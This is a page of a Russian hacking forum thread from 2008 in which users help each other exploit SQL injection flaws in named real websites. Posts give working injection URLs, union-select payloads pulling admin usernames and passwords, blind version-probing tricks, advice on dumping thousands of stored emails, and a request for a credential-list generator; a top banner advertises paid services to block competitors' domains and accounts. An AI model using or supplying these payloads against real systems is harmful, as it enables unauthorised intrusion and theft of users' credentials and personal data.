Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 268 из 1393

268

Опции темы

Поиск в этой теме

Опции просмотра

#2671

19.07.2008, 15:31

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Цитата:

Сообщение от 2la.painkiller

Хелп не могу сделать запрос
http://www.autoexotica.ru/news/?nid=128' дыра
http://www.autoexotica.ru/news/?nid=128+order+by+11/* колонок
http://www.autoexotica.ru/news/?nid=128+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Пишет ошибку как так?
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11/*' at line 1
SELECT *, DATE_FORMAT(date, "%d.%m.%y") AS frm_date FROM news_data WHERE news_id=128 union select 1,2,3,4,5,6,7,8,9,10,11/*

Дело в том что на сервере стоит 3 версия MySQL которая не поддерживает в подзапросах union
http://www.autoexotica.ru/news/?nid=128+AND+ascii(lower(substring(version(),1,1)) )=51

#2672

19.07.2008, 15:36

2la.painkiller

Новичок

Регистрация: 22.05.2008

Сообщений: 27

Провел на форуме:
80944

Репутация: 0

Ни чего не выводит в таком запросе ( И что такое наконце 51 ?
где можно почитать про взлом 3 версии?

#2673

19.07.2008, 20:02

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Отправить сообщение для MaSTeR GэN с помощью ICQ

2 2la.painkiller та не в запросе просто опечатка должно быть
substring(version(),1,1)=3/*
почитать можно на ачате вота линк
http://forum.antichat.ru/showpost.php?p=565034&postcount=4
пора бы уж хотя бы форуму научиться поиск делать

#2674

20.07.2008, 07:35

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

Цитата:

Сообщение от 2la.painkiller

Нет всё там нормально!
http://bikemaster.ru/popup_image1.php?pID=-1'+union+select+1,unhex(hex(concat_ws(user_name,0x 3a,user_password))),3,4,5+from+0x61646d696e6973747 261746f7273/*

1064 - You have an error in your SQL syntax near 'union select ...

Когда убираешь кавычку перед union, то вообще пустой экран.

#2675

20.07.2008, 12:17

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Цитата:

Сообщение от MaSTeR GэN

какая нахрен опечатка?
ascii там не зря стоит...
http://www.securitylab.ru/contest/212099.php

#2676

20.07.2008, 12:29

$p01nt

Участник форума

Регистрация: 19.02.2008

Сообщений: 186

Провел на форуме:
584540

Репутация: 96

есть sql inject, но с лимитом! Есть желание вытащить базу емайлов,но их можно просматривать только по одному, а их > нескольких тысяч,как вытащить?

#2677

20.07.2008, 12:38

Sharingan

Участник форума

Регистрация: 05.05.2007

Сообщений: 171

Провел на форуме:
1050662

Репутация: 435

Отправить сообщение для Sharingan с помощью ICQ

юзай сипт http://forum.antichat.ru/thread24918.html

#2678

20.07.2008, 16:22

c0rp$e

Постоянный

Регистрация: 05.12.2003

Сообщений: 340

Провел на форуме:
3548105

Репутация: 98

Ребят, подскажите пли3 универсальный, хороший генератор паролей.
Для создания листов user;password
самое главное чтобы там была возможность-
1. создание листа, где пароль повторяет имя юзера... ( т.е. берет из файла логины и приписывает, повторяет, логин в пароль...
Спасибо

#2679

20.07.2008, 18:16

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Цитата:

Сообщение от _Pantera_

какая нахрен опечатка?
ascii там не зря стоит...
http://www.securitylab.ru/contest/212099.php

А помоему зря - версия БД начинается, всё равно, с цифр (другого я не видел, по крайней мере если БД - мускул), поэтому что бы узнать первую цифру версии использовать ascii() не обязательно.
А вот для вывода не цифровых данных использовать ascii() в общем случае нужно.

#2680

21.07.2008, 00:23

Zircool

Участник форума

Регистрация: 01.03.2006

Сообщений: 169

Провел на форуме:
519496

Репутация: 78

Отправить сообщение для Zircool с помощью ICQ

Никак не получается раскрутить инъекцию

Цитата:

http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direc tion=1'

как только пытаюсь раскрутить пишет

Цитата:

sql injection attempt!

Страница 268 из 1393

268

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход